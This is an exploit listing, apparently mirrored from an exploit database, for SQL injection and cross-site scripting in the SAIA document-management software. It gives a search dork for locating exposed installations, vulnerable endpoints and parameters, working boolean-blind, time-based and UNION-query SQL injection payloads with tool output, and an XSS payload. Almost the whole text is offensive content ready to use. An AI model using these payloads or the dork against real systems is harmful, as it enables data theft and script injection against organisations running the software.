Exploit for SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerabilities

Name: Exploit for SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerabilities
Rating: 5 (148 reviews)

2020-03-28 | CVSS 0.4

## https://sploitus.com/exploit?id=1337DAY-ID-34153
################################
# Exploit Title: SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerability
# D0rk: intext:"Todos los derechos reservados CERO K"
# Exploit Author: n4pst3r
# Vendor Homepage: https://www.cerok.co/
# Tested on: Windows 10, Debian 9
################################ 
---------------------------------------------------------
  
SQLi:
 
http://localhost/path/saia/pantallas/buscador_principal.php?idbusqueda=[SQLi]&cmd=resetall
http://localhost/path/saia/noticia_index/mostrar_noticia.php?idnoticia_index=[SQLi]
 
Response:
 
Parameter: idbusqueda (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idbusqueda=24 AND 7287=7287&cmd=resetall

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idbusqueda=24 AND (SELECT 7591 FROM (SELECT(SLEEP(5)))Dnrp)&cmd=resetall

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: idbusqueda=-3640 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716a71,0x4c76476b62684f4147666
84c426c745774496d596c65494b486371636149787269794354564b6551,0x716a767171),NULL,NULL-- treG&cmd=resetall
 
XSS:
 
https://localhost/path/saia/index.php?texto_salir=[XSS]

Payload: <img src=xss onerror=alert("XSS")>


#  0day.today [2020-03-30]  #